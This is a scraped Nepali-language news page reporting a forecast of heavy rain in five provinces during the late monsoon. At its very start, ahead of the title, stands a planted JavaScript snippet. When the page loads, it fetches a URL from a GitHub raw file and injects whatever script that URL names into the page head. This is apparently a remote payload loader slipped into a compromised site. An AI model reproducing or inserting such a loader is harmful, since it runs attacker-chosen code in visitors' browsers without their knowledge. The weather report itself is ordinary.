;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); पाँच वटा प्रदेशका केही ठाउँमा ठूलो पानी पर्ने सम्भावना – जुनेली न्युज
शनिबार, असार २९, २०८२
  • होमपेज
  • पाँच वटा प्रदेशका केही ठाउँमा ठूलो पानी पर्ने सम्भावना
समाचार

पाँच वटा प्रदेशका केही ठाउँमा ठूलो पानी पर्ने सम्भावना

भदौ २२,
काठमाण्डाै । आज पाँच वटा प्रदेशका केही ठाउँमा ठूलो पानी पर्ने सम्भावना रहेको छ । मौसम पूर्वानुमान महाशाखाका अनुसार आज दिउँसो देशैभरकै मौसम बदली हुने र प्रदेश एक, दुई, वाग्मती, गण्डकी र प्रदेश पाँचका केही ठाउँमा मेघ गर्जनसहित ठूलो पानी पर्ने सम्भावना छ ।

अहिले पनि केही ठाउँमा पानी परिरहेको छ । कर्णाली र सुदूरपश्चिम प्रदेशमा भने आज ठूलो पानी पर्ने सम्भावना छैन । राति पनि देशका केही ठाउँमा पानी पर्ने महाशाखाको अनुमान छ ।

मनसुनकाे अन्तिमतिर आइपुगेकाले केही ठाउँमा अचानक ठूलो पानी पर्ने, मेघगर्जन र चट्याङ पर्ने क्रम बढेको छ ।

फेसबुक प्रतिक्रियाहरु